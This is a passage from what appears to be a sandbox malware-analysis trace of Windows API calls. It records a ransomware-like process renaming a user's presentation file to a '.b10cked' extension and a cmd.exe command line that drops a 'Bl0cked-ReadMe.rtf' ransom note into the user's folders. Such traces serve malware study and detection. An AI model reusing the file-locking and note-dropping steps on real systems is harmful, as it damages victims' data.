lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x18e9e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked", lpFilePart=0x0) returned 0x5f [0232.096] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx", nBufferLength=0x104, lpBuffer=0x18e9e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx", lpFilePart=0x0) returned 0x57 [0232.096] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\iydsdisdd3hcv.pptx")) returned 0x20 [0232.096] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\iydsdisdd3hcv.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\iyDSdIsdd3hcv.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\nrwdon~1\\1vhpwy~1\\ribq70~1\\iydsdisdd3hcv.pptx.b10cked"), dwFlags=0x3) returned 1 [0232.097] FindClose (in: hFindFile=0x1d0f68 | out: hFindFile=0x1d0f68) returned 1 [0232.097] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x18e998 | out: _Buffer=" 1") returned 9 [0232.097] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.097] GetFileType (hFile=0x7) returned 0x2 [0232.144] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0232.144] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x18e924 | out: lpMode=0x18e924) returned 1 [0232.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.145] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x18e958 | out: lpConsoleScreenBufferInfo=0x18e958) returned 1 [0232.147] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0232.148] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x18e998 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0232.148] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x18e97c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x18e97c*=0x1a) returned 1 [0232.151] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.151] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0232.174] _get_osfhandle (_FileHandle=1) returned 0x7 [0232.174] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0232.175] _get_osfhandle (_FileHandle=0) returned 0x3 [0232.175] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0232.176] SetConsoleInputExeNameW () returned 0x1 [0232.176] GetConsoleOutputCP () returned 0x1b5 [0232.177] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0232.177] SetThreadUILanguage (LangId=0x0) returned 0x409 [0232.192] exit (_Code=0) Process: id = "620" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16780" os_pid = "0xfcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34475 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34476 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34477 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34478 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34479 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34480 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34481 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34482 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34483 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 34484 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34609 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34610 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34611 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34612 start_va = 0x2d0000 end_va = 0x3cffff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 34613 start_va = 0x540000 end_va = 0x54ffff entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 34614 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34615 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34616 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34617 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34618 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34619 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34620 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34621 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34622 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34709 start_va = 0x1e0000 end_va = 0x2a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 34710 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34711 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34712 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34713 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34714 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 34715 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 34716 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 34717 start_va = 0x550000 end_va = 0x114ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 34718 start_va = 0x1150000 end_va = 0x12b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001150000" filename = "" Thread: id = 860 os_tid = 0x9f0 [0231.872] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16fa34 | out: lpSystemTimeAsFileTime=0x16fa34*(dwLowDateTime=0xbdc1bba0, dwHighDateTime=0x1d440a9)) [0231.872] GetCurrentProcessId () returned 0xfcc [0231.872] GetCurrentThreadId () returned 0x9f0 [0231.872] GetTickCount () returned 0x3fcd4 [0231.872] QueryPerformanceCounter (in: lpPerformanceCount=0x16fa2c | out: lpPerformanceCount=0x16fa2c*=28866384816) returned 1 [0231.875] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0231.875] __set_app_type (_Type=0x1) [0231.876] __p__fmode () returned 0x76b331f4 [0231.876] __p__commode () returned 0x76b331fc [0231.876] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0231.876] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0231.876] GetCurrentThreadId () returned 0x9f0 [0231.876] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9f0) returned 0x38 [0231.876] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0231.876] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0231.876] SetThreadUILanguage (LangId=0x0) returned 0x409 [0231.921] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0231.921] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16f9c4 | out: phkResult=0x16f9c4*=0x0) returned 0x2 [0231.921] VirtualQuery (in: lpAddress=0x16f9fb, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0231.921] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16f994, dwLength=0x1c | out: lpBuffer=0x16f994*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0231.921] GetConsoleOutputCP () returned 0x1b5 [0231.924] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.924] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0231.924] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.924] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0231.926] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.926] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0231.927] _get_osfhandle (_FileHandle=1) returned 0x7 [0231.927] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0231.929] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.929] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0231.930] _get_osfhandle (_FileHandle=0) returned 0x3 [0231.930] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0231.947] GetEnvironmentStringsW () returned 0x2e0208* [0231.947] FreeEnvironmentStringsW (penv=0x2e0208) returned 1 [0231.947] GetEnvironmentStringsW () returned 0x2e0208* [0231.948] FreeEnvironmentStringsW (penv=0x2e0208) returned 1 [0231.948] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e934 | out: phkResult=0x16e934*=0x40) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x98, lpcbData=0x16e938*=0x1000) returned 0x2 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x1000) returned 0x2 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x0, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x1000) returned 0x2 [0231.948] RegCloseKey (hKey=0x40) returned 0x0 [0231.948] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16e934 | out: phkResult=0x16e934*=0x40) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x40, lpcbData=0x16e938*=0x1000) returned 0x2 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x1, lpcbData=0x16e938*=0x1000) returned 0x2 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x0, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x9, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x4, lpData=0x16e940*=0x9, lpcbData=0x16e938*=0x4) returned 0x0 [0231.948] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16e93c, lpData=0x16e940, lpcbData=0x16e938*=0x1000 | out: lpType=0x16e93c*=0x0, lpData=0x16e940*=0x9, lpcbData=0x16e938*=0x1000) returned 0x2 [0231.948] RegCloseKey (hKey=0x40) returned 0x0 [0231.948] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863bf [0231.949] srand (_Seed=0x5b8863bf) [0231.949] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf\"" [0231.949] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\NRWDON~1\\1VHPWY~1\\RIBQ70~1\\Bl0cked-ReadMe.rtf\"" [0231.949] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.949] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1968, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0231.950] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0231.950] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0231.950] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.950] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0231.950] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0231.950] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0231.950] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0231.950] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0231.950] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0231.950] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0231.950] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0231.950] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0231.950] GetEnvironmentStringsW () returned 0x2e2358* [0231.950] FreeEnvironmentStringsW (penv=0x2e2358) returned 1 [0231.950] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0231.950] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0231.950] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0231.950] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0231.951] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0231.951] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0231.951] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0231.951] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0231.951] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0231.951] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0231.951] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16f700 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.951] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x16f700, lpFilePart=0x16f6fc | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x16f6fc*="Desktop") returned 0x18 [0231.951] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.951] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16f47c | out: lpFindFileData=0x16f47c) returned 0x2e09e8 [0231.951] FindClose (in: hFindFile=0x2e09e8 | out: hFindFile=0x2e09e8) returned 1 [0231.951] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x16f47c | out: lpFindFileData=0x16f47c) returned 0x2e09e8 [0231.951] FindClose (in: hFindFile=0x2e09e8 | out: hFindFile=0x2e09e8) returned 1 [0231.952] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x16f47c | out: lpFindFileData=0x16f47c) returned 0x2e09e8 [0231.952] FindClose (in: hFindFile=0x2e09e8 | out: hFindFile=0x2e09e8) returned 1 [0231.952] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0231.952] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0231.952] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0231.952] GetEnvironmentStringsW () returned 0x2e0208* [0231.952] FreeEnvironmentStringsW (penv=0x2e0208) returned 1 [0231.952] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0231.953] GetConsoleOutputCP () returned 0x1b5 [0231.978] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0231.978] GetUserDefaultLCID () returned 0x409 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x16f840, cchData=128 | out: lpLCData="0") returned 2 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x16f840, cchData=128 | out: lpLCData="0") returned 2 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x16f840, cchData=128 | out: lpLCData="1") returned 2 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0231.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0231.988] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0231.988] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0231.989] GetConsoleTitleW (in: lpConsoleTitle=0x2d0928, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0232.016] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0232.016] 